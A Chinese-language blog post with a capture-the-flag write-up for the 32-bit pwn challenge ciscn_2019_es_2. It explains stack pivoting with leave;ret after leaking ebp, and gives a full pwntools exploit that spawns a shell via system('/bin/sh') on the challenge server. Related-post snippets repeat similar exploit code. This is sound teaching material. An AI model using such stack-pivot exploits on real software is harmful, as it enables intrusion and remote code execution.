ciscn_2019_es_2 栈迁移(很好的例子)

最新推荐文章于 2024-04-27 22:57:35 发布
最新推荐文章于 2024-04-27 22:57:35 发布
阅读量1.2k 收藏 3
点赞数 3
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/118863961
版权

ciscn_2019_es_2

一道很好的栈迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。
main函数
题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露栈上地址用来给第二次做迁移使用,第二次执行栈迁移,控制ret跳转到我们所迁移的栈上,执行栈上填写的exp。由于第二次依然是在函数栈帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也够别的方法了),都需要在函数自己的栈帧内部写入。因此:通常泄露本栈帧中地址(有泄露的情况下)没有泄露的情况后面会写一个hitcontraining的题目
分析一下本题,由于printf(%s)在00存在截断,因此只需要填满buffer到ebp位置,就可以printf泄露ebp的值。
在这里插入图片描述
得到了ebp,需要查看ebp和输入buffer之间的偏移
在这里插入图片描述
如下图,由于两个printf在一个栈帧中并且都用s作为buffer,因此从下图中看到的ebp和esp之间的偏移也是第二次的。因此只需要把获取的ebp减去0x38就得到栈起始地址。
接下来是完整的栈迁移过程,如下图
在这里插入图片描述
接下来详细解释之。
leave ret的过程首先要理解。
在这里插入图片描述在这里插入图片描述
结合着本题来理解,本题在payload2位置的ret放置了leave_ret,根据上面的栈帧图,不难看出ebp的位置现在是ebp-0x38,也就是’aaaa’的位置。为什么要写aaaa呢?一步一步看。第一步,程序获取了ebp的值位ebp-0x38,接着做movl %ebp, %esp也就是把ebp-0x38移动到esp上,但是接下来一部pop esp,会直接将栈顶弹出。接下来ret的实际指令是pop eip也就是指令流直接跑到esp上去。由于popl ebp这一步,使得eip指向的是aaaa后面的指令。因此需要填充。
为什么这样做?考虑到正常的leave ret还要保存上一个函数栈帧位置,怎么保存?就靠的是popl ebp这一步。因为返回到上一个函数栈帧(movl ebp,esp)后,栈帧上第一个 位置(这里的aaaa)保存着再上一个函数ebp(套娃)这也实现了函数递归调用。
理解了上面aaaa的原因,接下来的就好懂了,无非是布置参数执行system

exp

from pwn import *
# io = process('./ciscn_2019_es_2')
io = remote('node4.buuoj.cn',27727)
elf = ELF('./ciscn_2019_es_2')
context.log_level='debug'



leave_ret = 0x080484b8
io.recvline()
payload1 = 'a'*0x26+'b'*2
io.send(payload1)
io.recvuntil('aabb')
ebp = u32(io.recv(4))
print "ebp----->" + hex(ebp)
        #    padding  # system             #ret addr   # binsh_addr  # bin sh       
payload2 = 'a'*0x4 + p32(elf.plt['system']) + 'bbbb' + p32(ebp-0x28)+'/bin'+'/sh\x00'
payload2=payload2.ljust(0x28,'\x00')
# pivot addr           # ret addr
payload2+=p32(ebp-0x38)+p32(leave_ret)
# gdb.attach(io,"b *0x080485FD")
io.sendline(payload2)

io.interactive()
N1ch0l4s
关注
专栏目录
cisn_2019_es_3——ROP迁移
weixin_44164182的博客
07-17 233
ROP迁移 通过leave和ret指令,将帧劫持到指定地址。一般用于存在溢出,但可溢出的字节数不足以写入完成ROP chain的情况。通过帧劫持,在可供写入的缓冲区内完成ROP chain构造,然后将帧劫持到指定地址,完成控制流劫持。 leave = mov esp,ebp pop ebp ret= pop eip 通过帧劫持,存在溢出的位置最少只需溢出两个dword(qword in x64)就可以完全控制程序执行流 如上程序,char s处存在两个dword的溢出,可以覆盖last_
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1064
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
ciscn_2019_es_2
m0sway的博客
11-22 2318
ciscn_2019_es_2 使用checksec查看: 只开启了不可执行,放进IDA中查看: 主函数中直接给了vul() 函数,跟进去查看: 程序读取了两次数据,都是用变量s接收,但溢出所需的输入空间不够 so…空间不够,可以考虑使用迁移的方式: 两次s变量使用的都是同一空间,可以使用第一次read去泄露出ebp的地址,接着利用第二次read在s变量处写入ROP,在ret时,进行迁移迁移到s处。 from pwn import * #start r = remote("node4.bu
ciscn_2019_es_2(迁移
qq_51687381的博客
08-27 325
代码不复杂,就是两个read和两个print 关键在于这个read的大小和v1的位置。 0x28的和0x30的大小,让我们直接rop的话只能溢出到ret的位置,而不能控制ret函数的参数。 这里就需要用到迁移,就把的位置往上提,让我们可以控制到ret和ret的参数。 既然我们想让往上提,那么就必须知道的具体位置,而我们知道,对于一个函数的帧中,有地址的位置就是ebp的位置,所以我们可以泄露出ebp的位置进而得到的位置。 from pwn import * a=proces...
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2548
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
buuctf ciscn_2019_es_2
carol2358的博客
04-24 676
通过这道题总算学会用gdb来调试stack了 一道迁移的题目,printf函数可以泄露出bp的地址 有system函数,但是没有/bin/sh,所以我采用了往stack里写入binsh,然后通过泄露出来的bp算出偏移来指向binsh的位置,从而getshell 调试的时候看泄露出的地址和aaaa的偏移,和binsh的偏移,上的地址是\xff开头 exp: from pwn import ...
【pwn】ciscn_2019_es_2
Nothing
12-24 2825
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到地址,然后进行迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置数据。 from pwn import * #io=process('ciscn...
ElasticSearch部署全攻略——数据迁移_elasticsearch 数据迁移
最新发布
2301_79098963的博客
04-27 1277
对于elasticsearch迁移,目前主要有三种方式,分别为快照、logstash和elasticsearch-dump。其中logstash需要两个es集群在同一个局域网下,通过源和目标的方式进行数据迁移;elasticsearch-dump可以按需将数据备份后,再进行恢复,但是速度非常慢;快照方式可异地恢复,但恢复的集群es版本不可低于备份集群的版本。就以上特性,根据自己的实际需求,进行选择。但综合起来快照方式的局限性和易操作性最小,因此推荐该种方式。
buuctf ciscn_2019_es_2 迁移(二)
weixin_45441024的博客
12-10 323
buuctf ciscn_2019_es_2 迁移(二) 相关的方法和步骤在后面注明 from pwn import * proc_name = '/home/pwn/Desktop/ciscn_2019_es_2' p = remote('node3.buuoj.cn', 27732) elf = ELF(proc_name) system_plt = elf.plt['system'] main_addr = elf.sym['main'] leave_ret = 0x80484b8 log.in
ciscn_2019_es_2(劫持)
qq_33590156的博客
08-04 168
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') #ms = process("./ciscn_2019_es_2") ms = remote('node3.buuoj.cn',29173) elf = ELF('./ciscn_2019_es_2') lea_ret_addr = 0x080484b8 system_plt = elf.plt['system']
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1375
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
从BUUCTF之ciscn_2019_es_2简单复习迁移,即stack pivoting
Probeginner的博客
11-27 1331
简单迁移迁移简单
【CTF】ciscn_2019_es_2
凉水的博客
07-25 1549
ciscn_2019_es_2
迁移练习
Civit_的博客
03-27 217
迁移基础——>
两题看迁移
qq_45691294的博客
01-05 671
文章目录迁移[Black Watch 入群题]PWN 迁移 迁移的题目一般有一个特点,就是可以产生溢出,但是溢出的长度太短导致无法写完整的payload,而实质就是只能控制ebp的情况下去控制住eip从而控制程序的执行流 以 32 位程序举例,在使用 call 这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后会进行一系列操作来还原现场 lea
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值